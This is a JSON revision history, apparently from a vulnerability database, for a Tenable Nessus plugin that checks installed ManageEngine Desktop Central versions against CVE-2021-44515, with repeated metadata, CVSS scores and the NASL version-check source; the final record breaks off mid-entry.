["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}], "modified": "2021-12-08T00:25:12", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2021-12-08T00:25:12", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/07\");\n\n script_cve_id(\"CVE-2021-44515\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-08T00:25:12", "differentElements": ["exploitEase", "modified"], "edition": 1}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "ad56b72e7e9de24da412c3ba83fb32fa", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-08T13:06:32", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-08T13:06:32", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2021-12-08T13:06:32", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/07\");\n\n script_cve_id(\"CVE-2021-44515\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-08T13:06:32", "differentElements": ["modified", "sourceData"], "edition": 2}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "2db4a06e9ce2e9b72efd0bfcf420b409", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fa9e3175", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-11T01:14:15", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-11T01:14:15", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2021-12-11T01:14:15", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/10\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-11T01:14:15", "differentElements": ["cpe", "cvss"], "edition": 3}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "ac4e991b5f162f55eb1d101d0a823cd4", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-11T12:00:04", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-11T12:00:04", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2021-12-11T12:00:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/10\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-11T12:00:04", "differentElements": ["cpe", "cvss", "vpr"], "edition": 4}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "e7577ff5cfea811ec3681e4e2c1ced34", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-11T23:35:05", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-11T23:35:05", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-12-11T23:35:05", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/10\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "solution": "Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-44515", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-12-03T00:00:00", "vulnerabilityPublicationDate": "2021-12-03T00:00:00", "exploitableWith": []}, "lastseen": "2021-12-11T23:35:05", "differentElements": ["vpr"], "edition": 5}, {"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "bcf1d4d430743b3795e7d9616bb6ad8e", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fa9e3175", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-13T23:41:31", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "cve", "idList": ["CVE-2021-44515"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-13T23:41:31", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-12-13T23:41:31", "rev": 2}}, "objectVersion": "1.6", "pluginID": "155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/10\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 